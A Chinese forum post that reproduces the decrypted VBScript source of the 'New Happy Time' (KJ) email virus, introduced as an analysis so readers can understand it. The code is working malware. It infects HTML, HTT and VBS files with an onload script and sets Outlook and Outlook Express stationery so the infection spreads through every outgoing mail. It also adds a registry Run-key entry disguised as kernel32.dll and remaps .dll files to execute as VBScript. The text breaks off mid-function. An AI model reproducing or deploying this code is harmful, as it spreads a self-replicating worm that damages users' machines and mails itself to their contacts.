//新快乐时光只感染desktop.ini,folder.htp文件,很简单,但是会造成系统速度快速降低,大量消耗资源,并且由于病毒的蹩脚,有时还会有错误产生。这个病毒是经过加密处理的,我几经查阅,将乱码翻译出来,请大家彻底的看穿这个病毒。这里把代码贴出来。有什么不是请提出。wang9658@263.net
dim inwhere,htmltext,vbstext,degreesign,appleobject,fso,wsshell,winpath,sube,finalydisk
sub kj_start()
kjsetdim()
kjcreatemilieu()
kjlikeit()
kjcreatemail()
kjpropagate()
end sub
function kjappendto(filepath,typestr)
on error resume next
set readtemp = fso.opentextfile(filepath,1)
tmpstr = readtemp.readall
if instr(tmpstr,"kj_start()") <> 0 or len(tmpstr) < 1 then
readtemp.close
exit function
end if
if typestr = "htt" then
readtemp.close
set filetemp = fso.opentextfile(filepath,2)
filetemp.write "<" & "body onload=""" & "vbscript:" & "kj_start()""" & ">" & vbcrlf & tmpstr & vbcrlf & htmltext
filetemp.close
set fattrib = fso.getfile(filepath)
fattrib.attributes = 34
else
readtemp.close
set filetemp = fso.opentextfile(filepath,8)
if typestr = "html" then
filetemp.write vbcrlf & "<" & "html>" & vbcrlf & "<" & "body onload=""" & "vbscript:" & "kj_start()""" & ">" & vbcrlf & htmltext
elseif typestr = "vbs" then
filetemp.write vbcrlf & vbstext
end if
filetemp.close
end if
end function
function kjchangesub(currentstring,lastindexchar)
if lastindexchar = 0 then
if left(lcase(currentstring),1) =< lcase("c") then
kjchangesub = finalydisk & ":\"
sube = 0
else
kjchangesub = chr(asc(left(lcase(currentstring),1)) - 1) & ":\"
sube = 0
end if
else
kjchangesub = mid(currentstring,1,lastindexchar)
end if
end function
function kjcreatemail()
on error resume next
if inwhere = "html" then
exit function
end if
sharefile = left(winpath,3) & "program files\common files\microsoft shared\stationery\blank.htm"
if (fso.fileexists(sharefile)) then
call kjappendto(sharefile,"html")
else
set filetemp = fso.opentextfile(sharefile,2,true)
filetemp.write "<" & "html>" & vbcrlf & "<" & "body onload=""" & "vbscript:" & "kj_start()""" & ">" & vbcrlf & htmltext
filetemp.close
end if
defaultid = wsshell.regread("hkey_current_user\identities\default user id")
outlookversion = wsshell.regread("hkey_local_machine\software\microsoft\outlook express\mediaver")
wsshell.regwrite "hkey_current_user\identities\"&defaultid&"\software\microsoft\outlook express\"& left(outlookversion,1) &".0\mail\compose use stationery",1,"reg_dword"
call kjmailreg("hkey_current_user\identities\"&defaultid&"\software\microsoft\outlook express\"& left(outlookversion,1) &".0\mail\stationery name",sharefile)
call kjmailreg("hkey_current_user\identities\"&defaultid&"\software\microsoft\outlook express\"& left(outlookversion,1) &".0\mail\wide stationery name",sharefile)
wsshell.regwrite "hkey_current_user\software\microsoft\office\9.0\outlook\options\mail\editorpreference",131072,"reg_dword"
call kjmailreg("hkey_current_user\software\microsoft\windows messaging subsystem\profiles\microsoft outlook internet settings\0a0d020000000000c000000000000046\001e0360","blank")
call kjmailreg("hkey_current_user\software\microsoft\windows nt\currentversion\windows messaging subsystem\profiles\microsoft outlook internet settings\0a0d020000000000c000000000000046\001e0360","blank")
wsshell.regwrite "hkey_current_user\software\microsoft\office\10.0\outlook\options\mail\editorpreference",131072,"reg_dword"
call kjmailreg("hkey_current_user\software\microsoft\office\10.0\common\mailsettings\newstationery","blank")
kjummagefolder(left(winpath,3) & "program files\common files\microsoft shared\stationery")
end function
function kjcreatemilieu()
on error resume next
temppath = ""
if not(fso.fileexists(winpath & "wscript.exe")) then
temppath = "system32\"
end if
if temppath = "system32\" then
startupfile = winpath & "system\kernel32.dll"
else
startupfile = winpath & "system\kernel.dll"
end if
wsshell.regwrite "hkey_local_machine\software\microsoft\windows\currentversion\run\kernel32",startupfile
fso.copyfile winpath & "web\kjwall.gif",winpath & "web\folder.htt"
fso.copyfile winpath & "system32\kjwall.gif",winpath & "system32\desktop.ini"
call kjappendto(winpath & "web\folder.htt","htt")
wsshell.regwrite "hkey_classes_root\.dll\","dllfile"
wsshell.regwrite "hkey_classes_root\.dll\content type","application/x-msdownload"
wsshell.regwrite "hkey_classes_root\dllfile\defaulticon\",wsshell.regread("hkey_classes_root\vxdfile\defaulticon\")
wsshell.regwrite "hkey_classes_root\dllfile\scriptengine\","vbscript"
